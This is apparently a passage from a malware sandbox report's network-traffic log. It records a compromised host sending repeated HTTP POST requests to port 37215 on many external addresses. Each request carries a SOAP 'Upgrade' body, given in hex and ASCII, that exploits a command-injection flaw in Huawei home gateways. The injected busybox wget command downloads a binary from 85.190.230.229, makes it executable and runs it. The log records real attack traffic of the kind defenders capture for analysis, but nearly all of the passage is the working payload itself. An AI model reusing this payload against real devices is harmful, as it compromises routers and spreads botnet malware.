                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      93192.168.2.1437830102.185.143.137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.301517963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.114094019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      94192.168.2.1443424102.204.35.11037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.303663969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      95192.168.2.1438456197.96.119.6237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.522792101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.274022102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      96192.168.2.1445458197.24.231.22237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.523622990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      97192.168.2.1453850102.118.223.17437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.525053978 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      98192.168.2.1460308197.202.215.6137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.526199102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.306030035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      99192.168.2.1448180102.125.181.5037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.627214909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.434072018 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
